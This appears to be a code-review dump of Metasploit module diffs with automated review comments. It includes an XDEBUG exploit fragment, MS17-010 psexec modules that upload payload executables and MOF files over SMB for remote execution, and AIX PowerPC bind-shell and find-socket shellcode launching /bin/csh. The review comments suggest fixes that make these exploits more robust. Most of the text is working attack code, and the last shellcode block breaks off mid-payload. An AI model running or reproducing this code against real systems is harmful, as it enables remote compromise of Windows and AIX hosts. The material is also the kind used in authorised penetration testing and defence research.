print_status("Sending payload of size #{cmd1.length} bytes")
|
||||
register_file_for_cleanup(file)
|
||||
client.write(cmd1)
|
||||
client.close
|
||||
server.close
|
||||
webserver.exit
|
||||
ensure
|
||||
webserver.exit
|
||||
end
|
||||
end
|
||||
send_request_cgi({
|
||||
'uri' => datastore['PATH'],
|
||||
'method' => 'GET',
|
||||
'headers' => {
|
||||
'X-Forwarded-For' => "#{lhost}",
|
||||
'Cookie' => 'XDEBUG_SESSION='+rand_text_alphanumeric(10)
|
||||
}
|
||||
})
|
||||
end
|
||||
end
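Review bot: In `check`, `vprint_status "Request sent\n#{res.headers}"` dereferences `res` on the line before the `if res && res.headers.to_s =~ /XDEBUG/i` guard, so a request that gets no response (send_request_cgi returns nil on timeout) raises NoMethodError instead of reaching the guard or the `rescue Rex::ConnectionError` branch; write it as `vprint_status("Request sent\n#{res.headers}") if res`. In `exploit`, `client.close` and `server.close` run only on the happy path after `client.write(cmd1)`, so an exception in `server.accept`, `client.recv` or the write leaves the listener bound on SRVPORT for the rest of the session; move them into the `ensure` as `client.close if client` and `server.close if server`. The `webserver.exit` before the `ensure` is redundant with the one inside it, and from within the thread's own block `Thread.current.exit` (or simply letting the block end) is clearer than referring to the outer variable.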
|
|
@ -17,6 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
|
||||
include Msf::Exploit::Remote::SMB::Client::Psexec
|
||||
include Msf::Exploit::Powershell
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::WbemExec
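Review bot: The new `include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010` is placed ahead of `include Msf::Exploit::Remote::SMB::Client::Psexec`, and in Ruby the later include takes precedence, so if both mixins define a method with the same name the `Psexec` version is the one this module will call. A one-line comment on the new include naming the helpers it is expected to supply (the `powershell_installed?`, `execute_powershell_payload`, `native_upload` and `mof_upload` calls that `smb_pwn` now makes) would make the ordering intentional rather than accidental, e.g. `# provides the ms17-010 psexec helpers used by smb_pwn; must precede Psexec only if no names overlap`, adjusted to what the mixin actually defines.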
|
||||
|
@ -119,221 +120,21 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def smb_pwn()
|
||||
case target.name
|
||||
when 'Automatic'
|
||||
if powershell_installed?
|
||||
if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])
|
||||
print_status('Selecting PowerShell target')
|
||||
powershell
|
||||
execute_powershell_payload
|
||||
else
|
||||
print_status('Selecting native target')
|
||||
native_upload
|
||||
native_upload(datastore['SHARE'])
|
||||
end
|
||||
when 'PowerShell'
|
||||
powershell
|
||||
execute_powershell_payload
|
||||
when 'Native upload'
|
||||
native_upload
|
||||
when 'MOF upload'
|
||||
mof_upload
|
||||
mof_upload(datastore['SHARE'])
|
||||
end
|
||||
|
||||
handler
|
||||
end
|
||||
|
||||
|
||||
# TODO: Again, shamelessly copypasta from the psexec exploit module. Needs to
|
||||
# be moved into a mixin
|
||||
|
||||
def powershell_installed?
|
||||
share = "\\\\#{datastore['RHOST']}\\#{datastore['SHARE']}"
|
||||
|
||||
case datastore['SHARE'].upcase
|
||||
when 'ADMIN$'
|
||||
path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
when 'C$'
|
||||
path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
else
|
||||
path = datastore['PSH_PATH']
|
||||
end
|
||||
|
||||
simple.connect(share)
|
||||
|
||||
vprint_status("Checking for #{path}")
|
||||
|
||||
if smb_file_exist?(path)
|
||||
vprint_status('PowerShell found')
|
||||
psh = true
|
||||
else
|
||||
vprint_status('PowerShell not found')
|
||||
psh = false
|
||||
end
|
||||
|
||||
simple.disconnect(share)
|
||||
|
||||
psh
|
||||
end
|
||||
|
||||
def powershell
|
||||
ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
|
||||
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
|
||||
|
||||
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
|
||||
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
|
||||
end
|
||||
|
||||
# Execute the powershell command
|
||||
print_status("Executing the payload...")
|
||||
begin
|
||||
psexec(command)
|
||||
rescue StandardError => exec_command_error
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||
end
|
||||
end
|
||||
|
||||
def native_upload
|
||||
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
|
||||
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
|
||||
serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''
|
||||
|
||||
# Upload the shellcode to a file
|
||||
print_status("Uploading payload...")
|
||||
smbshare = datastore['SHARE']
|
||||
fileprefix = ""
|
||||
# if SHARE = Users/sasha/ or something like this
|
||||
if smbshare =~ /.[\\\/]/
|
||||
subfolder = true
|
||||
smbshare = datastore['SHARE'].dup
|
||||
smbshare = smbshare.gsub(/^[\\\/]/,"")
|
||||
folder_list = smbshare.split(/[\\\/]/)
|
||||
smbshare = folder_list[0]
|
||||
fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
fd = smb_open("\\#{fileprefix}\\#(unknown)", 'rwct')
|
||||
else
|
||||
subfolder = false
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
fd = smb_open("\\#(unknown)", 'rwct')
|
||||
end
|
||||
exe = ''
|
||||
opts = { :servicename => servicename, :serviceencoder => serviceencoder}
|
||||
begin
|
||||
exe = generate_payload_exe_service(opts)
|
||||
|
||||
fd << exe
|
||||
ensure
|
||||
fd.close
|
||||
end
|
||||
|
||||
if subfolder
|
||||
print_status("Created \\#{fileprefix}\\#(unknown)...")
|
||||
else
|
||||
print_status("Created \\#(unknown)...")
|
||||
end
|
||||
|
||||
# Disconnect from the share
|
||||
simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
|
||||
# define the file location
|
||||
if datastore['SHARE'] == 'ADMIN$'
|
||||
file_location = "%SYSTEMROOT%\\#(unknown)"
|
||||
elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/
|
||||
file_location = datastore['SHARE'].slice(0,1) + ":\\#(unknown)"
|
||||
else
|
||||
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#(unknown)"
|
||||
end
|
||||
|
||||
psexec(file_location, false)
|
||||
|
||||
unless datastore['SERVICE_PERSIST']
|
||||
print_status("Deleting \\#(unknown)...")
|
||||
#This is not really useful but will prevent double \\ on the wire :)
|
||||
if datastore['SHARE'] =~ /.[\\\/]/
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
begin
|
||||
simple.delete("\\#{fileprefix}\\#(unknown)")
|
||||
rescue XCEPT::ErrorCode => e
|
||||
print_error("Delete of \\#{fileprefix}\\#(unknown) failed: #{e.message}")
|
||||
end
|
||||
else
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
begin
|
||||
simple.delete("\\#(unknown)")
|
||||
rescue XCEPT::ErrorCode => e
|
||||
print_error("Delete of \\#(unknown) failed: #{e.message}")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def mof_upload
|
||||
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
|
||||
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
|
||||
|
||||
# payload as exe
|
||||
print_status("Trying wbemexec...")
|
||||
print_status("Uploading Payload...")
|
||||
if datastore['SHARE'] != 'ADMIN$'
|
||||
print_error('Wbem will only work with ADMIN$ share')
|
||||
return
|
||||
end
|
||||
simple.connect(share)
|
||||
exe = generate_payload_exe
|
||||
fd = smb_open("\\system32\\#(unknown)", 'rwct')
|
||||
fd << exe
|
||||
fd.close
|
||||
print_status("Created %SystemRoot%\\system32\\#(unknown)")
|
||||
|
||||
# mof to cause execution of above
|
||||
mofname = rand_text_alphanumeric(14) + ".MOF"
|
||||
mof = generate_mof(mofname, filename)
|
||||
print_status("Uploading MOF...")
|
||||
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
|
||||
fd << mof
|
||||
fd.close
|
||||
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
|
||||
|
||||
# Disconnect from the ADMIN$
|
||||
simple.disconnect(share)
|
||||
end
|
||||
|
||||
def report_auth
|
||||
service_data = {
|
||||
address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
|
||||
port: datastore['RPORT'],
|
||||
service_name: 'smb',
|
||||
protocol: 'tcp',
|
||||
workspace_id: myworkspace_id
|
||||
}
|
||||
|
||||
credential_data = {
|
||||
origin_type: :service,
|
||||
module_fullname: self.fullname,
|
||||
private_data: datastore['SMBPass'],
|
||||
username: datastore['SMBUser'].downcase
|
||||
}
|
||||
|
||||
if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
|
||||
credential_data.merge!({
|
||||
realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
|
||||
realm_value: datastore['SMBDomain']
|
||||
})
|
||||
end
|
||||
|
||||
if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
|
||||
credential_data.merge!({:private_type => :ntlm_hash})
|
||||
else
|
||||
credential_data.merge!({:private_type => :password})
|
||||
end
|
||||
|
||||
credential_data.merge!(service_data)
|
||||
|
||||
credential_core = create_credential(credential_data)
|
||||
|
||||
login_data = {
|
||||
access_level: 'Admin',
|
||||
core: credential_core,
|
||||
last_attempted_at: DateTime.now,
|
||||
status: Metasploit::Model::Login::Status::SUCCESSFUL
|
||||
}
|
||||
|
||||
login_data.merge!(service_data)
|
||||
create_credential_login(login_data)
|
||||
end
|
||||
end
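Review bot: The `when 'Native upload'` branch of `smb_pwn` appears to keep the bare `native_upload` call, while the `Automatic` branch in the same hunk and the sibling module later in this commit now call `native_upload(datastore['SHARE'])`; if the mixin's `native_upload` takes the share as a required parameter, selecting the 'Native upload' target raises ArgumentError at run time. Change that line to `native_upload(datastore['SHARE'])` so all four dispatch branches pass the share the same way. Since the helpers were moved out of the module, a short comment above the `case` saying the helpers now come from the Psexec_MS17_010 mixin would save the next reader a search.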
|
||||
|
|
|
@ -112,177 +112,25 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
case target.name
|
||||
when 'Automatic'
|
||||
if powershell_installed?
|
||||
if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])
|
||||
print_status('Selecting PowerShell target')
|
||||
powershell
|
||||
execute_powershell_payload
|
||||
else
|
||||
print_status('Selecting native target')
|
||||
native_upload
|
||||
native_upload(datastore['SHARE'])
|
||||
end
|
||||
when 'PowerShell'
|
||||
powershell
|
||||
execute_powershell_payload
|
||||
when 'Native upload'
|
||||
native_upload
|
||||
native_upload(datastore['SHARE'])
|
||||
when 'MOF upload'
|
||||
mof_upload
|
||||
mof_upload(datastore['SHARE'])
|
||||
end
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
def powershell_installed?
|
||||
share = "\\\\#{datastore['RHOST']}\\#{datastore['SHARE']}"
|
||||
|
||||
case datastore['SHARE'].upcase
|
||||
when 'ADMIN$'
|
||||
path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
when 'C$'
|
||||
path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||
else
|
||||
path = datastore['PSH_PATH']
|
||||
end
|
||||
|
||||
simple.connect(share)
|
||||
|
||||
vprint_status("Checking for #{path}")
|
||||
|
||||
if smb_file_exist?(path)
|
||||
vprint_status('PowerShell found')
|
||||
psh = true
|
||||
else
|
||||
vprint_status('PowerShell not found')
|
||||
psh = false
|
||||
end
|
||||
|
||||
simple.disconnect(share)
|
||||
|
||||
psh
|
||||
end
|
||||
|
||||
def powershell
|
||||
ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
|
||||
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
|
||||
|
||||
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
|
||||
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
|
||||
end
|
||||
|
||||
# Execute the powershell command
|
||||
print_status("Executing the payload...")
|
||||
begin
|
||||
psexec(command)
|
||||
rescue StandardError => exec_command_error
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
|
||||
end
|
||||
end
|
||||
|
||||
def native_upload
|
||||
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
|
||||
servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)
|
||||
serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''
|
||||
|
||||
# Upload the shellcode to a file
|
||||
print_status("Uploading payload...")
|
||||
smbshare = datastore['SHARE']
|
||||
fileprefix = ""
|
||||
# if SHARE = Users/sasha/ or something like this
|
||||
if smbshare =~ /.[\\\/]/
|
||||
subfolder = true
|
||||
smbshare = datastore['SHARE'].dup
|
||||
smbshare = smbshare.gsub(/^[\\\/]/,"")
|
||||
folder_list = smbshare.split(/[\\\/]/)
|
||||
smbshare = folder_list[0]
|
||||
fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
fd = smb_open("\\#{fileprefix}\\#(unknown)", 'rwct')
|
||||
else
|
||||
subfolder = false
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
fd = smb_open("\\#(unknown)", 'rwct')
|
||||
end
|
||||
exe = ''
|
||||
opts = { :servicename => servicename, :serviceencoder => serviceencoder}
|
||||
begin
|
||||
exe = generate_payload_exe_service(opts)
|
||||
|
||||
fd << exe
|
||||
ensure
|
||||
fd.close
|
||||
end
|
||||
|
||||
if subfolder
|
||||
print_status("Created \\#{fileprefix}\\#(unknown)...")
|
||||
else
|
||||
print_status("Created \\#(unknown)...")
|
||||
end
|
||||
|
||||
# Disconnect from the share
|
||||
simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
|
||||
# define the file location
|
||||
if datastore['SHARE'] == 'ADMIN$'
|
||||
file_location = "%SYSTEMROOT%\\#(unknown)"
|
||||
elsif datastore['SHARE'] =~ /^[a-zA-Z]\$$/
|
||||
file_location = datastore['SHARE'].slice(0,1) + ":\\#(unknown)"
|
||||
else
|
||||
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#(unknown)"
|
||||
end
|
||||
|
||||
psexec(file_location, false)
|
||||
|
||||
unless datastore['SERVICE_PERSIST']
|
||||
print_status("Deleting \\#(unknown)...")
|
||||
#This is not really useful but will prevent double \\ on the wire :)
|
||||
if datastore['SHARE'] =~ /.[\\\/]/
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
begin
|
||||
simple.delete("\\#{fileprefix}\\#(unknown)")
|
||||
rescue XCEPT::ErrorCode => e
|
||||
print_error("Delete of \\#{fileprefix}\\#(unknown) failed: #{e.message}")
|
||||
end
|
||||
else
|
||||
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
|
||||
begin
|
||||
simple.delete("\\#(unknown)")
|
||||
rescue XCEPT::ErrorCode => e
|
||||
print_error("Delete of \\#(unknown) failed: #{e.message}")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def mof_upload
|
||||
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
|
||||
filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
|
||||
|
||||
# payload as exe
|
||||
print_status("Trying wbemexec...")
|
||||
print_status("Uploading Payload...")
|
||||
if datastore['SHARE'] != 'ADMIN$'
|
||||
print_error('Wbem will only work with ADMIN$ share')
|
||||
return
|
||||
end
|
||||
simple.connect(share)
|
||||
exe = generate_payload_exe
|
||||
fd = smb_open("\\system32\\#(unknown)", 'rwct')
|
||||
fd << exe
|
||||
fd.close
|
||||
print_status("Created %SystemRoot%\\system32\\#(unknown)")
|
||||
|
||||
# mof to cause execution of above
|
||||
mofname = rand_text_alphanumeric(14) + ".MOF"
|
||||
mof = generate_mof(mofname, filename)
|
||||
print_status("Uploading MOF...")
|
||||
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
|
||||
fd << mof
|
||||
fd.close
|
||||
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
|
||||
|
||||
# Disconnect from the ADMIN$
|
||||
simple.disconnect(share)
|
||||
end
|
||||
|
||||
def report_auth
|
||||
service_data = {
|
||||
address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
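Review bot: `datastore['SHARE']` is read at four separate call sites in the new `case target.name` dispatch (`powershell_installed?`, both `native_upload` calls and `mof_upload`); hoisting it once as `share = datastore['SHARE']` above the `case` and passing `share` to each helper keeps the calls short and makes it obvious that every branch operates on the same share. The same applies to the first module's `smb_pwn` in this commit. The enclosing `smb_pwn` definition starts before this hunk, and `report_auth` at the end of the hunk continues past it.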
|
||||
|
|
|
@ -40,70 +40,70 @@ module MetasploitModule
|
|||
super(*args)
|
||||
|
||||
payload =
|
||||
"\x7f\xff\xfa\x79" +# xor. r31,r31,r31 #
|
||||
"\x40\x82\xff\xfd" +# bnel <bndsockcode> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
|
||||
"\x3b\xde\xfe\x1d" +# cal r30,-483(r30) #
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x20" +# bctr #
|
||||
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
|
||||
"\x44\xff\xff\x02" +# svca 0 #
|
||||
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
|
||||
"\x3b\xa0\x07\xff" +# lil r29,2047 #
|
||||
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
||||
"\x38\x9d\xf8\x02" +# cal r4,-2046(r29) #
|
||||
"\x38\x7d\xf8\x03" +# cal r3,-2045(r29) #
|
||||
"\x7f\xff\xfa\x79" + # xor. r31,r31,r31 #
|
||||
"\x40\x82\xff\xfd" + # bnel <bndsockcode> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
|
||||
"\x3b\xde\xfe\x1d" + # cal r30,-483(r30) #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x20" + # bctr #
|
||||
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
|
||||
"\x44\xff\xff\x02" + # svca 0 #
|
||||
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
|
||||
"\x3b\xa0\x07\xff" + # lil r29,2047 #
|
||||
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
|
||||
"\x38\x9d\xf8\x02" + # cal r4,-2046(r29) #
|
||||
"\x38\x7d\xf8\x03" + # cal r3,-2045(r29) #
|
||||
@cal_socket +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7c\x7c\x1b\x78" +# mr r28,r3 #
|
||||
"\x38\xbd\xf8\x11" +# cal r5,-2031(r29) #
|
||||
"\x3f\x60\xff\x02" +# liu r27,-254 #
|
||||
"\x63\x7b\x11\x5c" +# oril r27,r27,4444 #
|
||||
"\x97\xe1\xff\xfc" +# stu r31,-4(r1) #
|
||||
"\x97\x61\xff\xfc" +# stu r27,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7c\x7c\x1b\x78" + # mr r28,r3 #
|
||||
"\x38\xbd\xf8\x11" + # cal r5,-2031(r29) #
|
||||
"\x3f\x60\xff\x02" + # liu r27,-254 #
|
||||
"\x63\x7b\x11\x5c" + # oril r27,r27,4444 #
|
||||
"\x97\xe1\xff\xfc" + # stu r31,-4(r1) #
|
||||
"\x97\x61\xff\xfc" + # stu r27,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
@cal_bind +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7f\x83\xe3\x78" +# mr r3,r28 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7f\x83\xe3\x78" + # mr r3,r28 #
|
||||
@cal_listen +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7f\x83\xe3\x78" +# mr r3,r28 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7f\x83\xe3\x78" + # mr r3,r28 #
|
||||
@cal_accept +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
|
||||
"\x3b\x3d\xf8\x03" +# cal r25,-2045(r29) #
|
||||
"\x7f\x23\xcb\x78" +# mr r3,r25 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
|
||||
"\x3b\x3d\xf8\x03" + # cal r25,-2045(r29) #
|
||||
"\x7f\x23\xcb\x78" + # mr r3,r25 #
|
||||
@cal_close +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7f\x25\xcb\x78" +# mr r5,r25 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7f\x43\xd3\x78" +# mr r3,r26 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x7f\x25\xcb\x78" + # mr r5,r25 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7f\x43\xd3\x78" + # mr r3,r26 #
|
||||
@cal_kfcntl +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x37\x39\xff\xff" +# ai. r25,r25,-1 #
|
||||
"\x40\x80\xff\xd4" +# bge <bndsockcode+160> #
|
||||
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" +# bnel <bndsockcode+208> #
|
||||
"\x7f\x08\x02\xa6" +# mflr r24 #
|
||||
"\x3b\x18\x01\xff" +# cal r24,511(r24) #
|
||||
"\x38\x78\xfe\x29" +# cal r3,-471(r24) #
|
||||
"\x98\xb8\xfe\x31" +# stb r5,-463(r24) #
|
||||
"\x94\xa1\xff\xfc" +# stu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" +# stu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" +# mr r4,r1 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x37\x39\xff\xff" + # ai. r25,r25,-1 #
|
||||
"\x40\x80\xff\xd4" + # bge <bndsockcode+160> #
|
||||
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
|
||||
"\x40\x82\xff\xfd" + # bnel <bndsockcode+208> #
|
||||
"\x7f\x08\x02\xa6" + # mflr r24 #
|
||||
"\x3b\x18\x01\xff" + # cal r24,511(r24) #
|
||||
"\x38\x78\xfe\x29" + # cal r3,-471(r24) #
|
||||
"\x98\xb8\xfe\x31" + # stb r5,-463(r24) #
|
||||
"\x94\xa1\xff\xfc" + # stu r5,-4(r1) #
|
||||
"\x94\x61\xff\xfc" + # stu r3,-4(r1) #
|
||||
"\x7c\x24\x0b\x78" + # mr r4,r1 #
|
||||
@cal_execve +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"/bin/csh"
|
||||
|
||||
# If the payload is generated and there are offsets to substitute,
|
||||
|
|
|
@ -40,59 +40,59 @@ module MetasploitModule
|
|||
super(*args)
|
||||
|
||||
payload =
|
||||
"\x7f\xff\xfa\x79" +# xor. r31,r31,r31 #
|
||||
"\x40\x82\xff\xfd" +# bnel <fndsockcode> #
|
||||
"\x7f\xc8\x02\xa6" +# mflr r30 #
|
||||
"\x3b\xde\x01\xff" +# cal r30,511(r30) #
|
||||
"\x3b\xde\xfe\x1d" +# cal r30,-483(r30) #
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x20" +# bctr #
|
||||
"\x4c\xc6\x33\x42" +# crorc 6,6,6 #
|
||||
"\x44\xff\xff\x02" +# svca 0 #
|
||||
"\x3b\xde\xff\xf8" +# cal r30,-8(r30) #
|
||||
"\x3b\xa0\x07\xff" +# lil r29,2047 #
|
||||
"\x97\xe1\xff\xfc" +# stu r31,-4(r1) #
|
||||
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
|
||||
"\x3b\x7d\xf8\x2d" +# cal r27,-2003(r29) #
|
||||
"\x97\x61\xff\xfc" +# stu r27,-4(r1) #
|
||||
"\x7c\x3b\x0b\x78" +# mr r27,r1 #
|
||||
"\x3b\xff\x01\xff" +# cal r31,511(r31) #
|
||||
"\x3b\xff\xfe\x02" +# cal r31,-510(r31) #
|
||||
"\x7f\x65\xdb\x78" +# mr r5,r27 #
|
||||
"\x7f\x84\xe3\x78" +# mr r4,r28 #
|
||||
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
|
||||
"\x7f\xff\xfa\x79" + # xor. r31,r31,r31 #
|
||||
"\x40\x82\xff\xfd" + # bnel <fndsockcode> #
|
||||
"\x7f\xc8\x02\xa6" + # mflr r30 #
|
||||
"\x3b\xde\x01\xff" + # cal r30,511(r30) #
|
||||
"\x3b\xde\xfe\x1d" + # cal r30,-483(r30) #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x20" + # bctr #
|
||||
"\x4c\xc6\x33\x42" + # crorc 6,6,6 #
|
||||
"\x44\xff\xff\x02" + # svca 0 #
|
||||
"\x3b\xde\xff\xf8" + # cal r30,-8(r30) #
|
||||
"\x3b\xa0\x07\xff" + # lil r29,2047 #
|
||||
"\x97\xe1\xff\xfc" + # stu r31,-4(r1) #
|
||||
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
|
||||
"\x3b\x7d\xf8\x2d" + # cal r27,-2003(r29) #
|
||||
"\x97\x61\xff\xfc" + # stu r27,-4(r1) #
|
||||
"\x7c\x3b\x0b\x78" + # mr r27,r1 #
|
||||
"\x3b\xff\x01\xff" + # cal r31,511(r31) #
|
||||
"\x3b\xff\xfe\x02" + # cal r31,-510(r31) #
|
||||
"\x7f\x65\xdb\x78" + # mr r5,r27 #
|
||||
"\x7f\x84\xe3\x78" + # mr r4,r28 #
|
||||
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
|
||||
@cal_getpeername +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x3b\x5c\x01\xff" +# cal r26,511(r28) #
|
||||
"\xa3\x5a\xfe\x03" +# lhz r26,-509(r26) #
|
||||
"\x28\x1a\x11\x5c" +# cmpli 0,r26,4444 #
|
||||
"\x40\x82\xff\xd4" +# bne <fndsockcode+64> #
|
||||
"\x3b\x3d\xf8\x03" +# cal r25,-2045(r29) #
|
||||
"\x7f\x23\xcb\x78" +# mr r3,r25 #
|
||||
"\x7f\xc9\x03\xa6" + # mtctr r30 #
|
||||
"\x4e\x80\x04\x21" + # bctrl #
|
||||
"\x3b\x5c\x01\xff" + # cal r26,511(r28) #
|
||||
"\xa3\x5a\xfe\x03" + # lhz r26,-509(r26) #
|
||||
"\x28\x1a\x11\x5c" + # cmpli 0,r26,4444 #
|
||||
"\x40\x82\xff\xd4" + # bne <fndsockcode+64> #
|
||||
"\x3b\x3d\xf8\x03" + # cal r25,-2045(r29) #
|
||||
"\x7f\x23\xcb\x78" + # mr r3,r25 #
|
||||
@cal_close +
|
||||
"\x7f\xc9\x03\xa6" +# mtctr r30 #
|
||||
"\x4e\x80\x04\x21" +# bctrl #
|
||||
"\x7f\x25\xcb\x78" +# mr r5,r25 #
|
||||
